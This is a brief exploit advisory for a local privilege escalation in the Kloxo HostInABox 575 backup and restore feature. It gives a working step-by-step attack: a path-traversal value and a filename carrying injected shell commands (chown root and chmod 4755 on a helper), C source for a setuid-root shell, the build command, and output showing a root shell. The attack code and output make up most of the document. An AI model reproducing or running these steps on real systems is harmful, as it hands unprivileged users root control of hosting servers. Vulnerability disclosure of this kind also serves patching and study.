Kloxo HostInABox 575 - shell invocation, local command execution as root



DESCRIPTION


metacharacter injection in the backup feature allows local users to execute commands as root.



IMPACT


Local users could obtain root privileges.

1. Log into Kloxo
2. Click "Backup Home"
3. In the field labeled "Backup From File", type: ../../../../../../../../tmp/;cd ..;chown root.root shell;chmod 4755 shell;
4. In the shell, issue the following commands:
[user1@testing574 ~]$ cd /tmp
[user1@testing574 /tmp]$ cat>shell.c<<EOF
int main(){
  setgid(0);
  setuid(0);
  system("/bin/bash");
}
EOF
[user1@testing574 /tmp]$ gcc shell.c -o shell
[user1@testing574 /tmp]$ touch ';cd ..;chown root.root shell;chmod 4755 shell;'
5. Back in Kloxo, click "Start Restore Process"

Now the local, unprivileged user has a suid root helper shell:

[user1@testing574 tmp]$ ls -al
total 28
drwxrwxrwt  4 root  root  4096 May 21 08:41 .
drwxr-xr-x 24 root  root  4096 May 19 16:57 ..
-rw-rw-r--  1 user1 user1    0 May 21 08:40 ;cd ..;chown root.root shell;chmod 4755 shell;
drwx------  2 root  root  4096 May 21 08:41 backupPdUzR4
-rwsr-xr-x  1 root  root  5056 May 21 08:41 shell
-rw-rw-r--  1 user1 user1   89 May 21 08:33 shell.c


[user1@testing574 /tmp]$ ./shell
[root@testing574 /tmp]# id
uid=0(root) gid=0(root)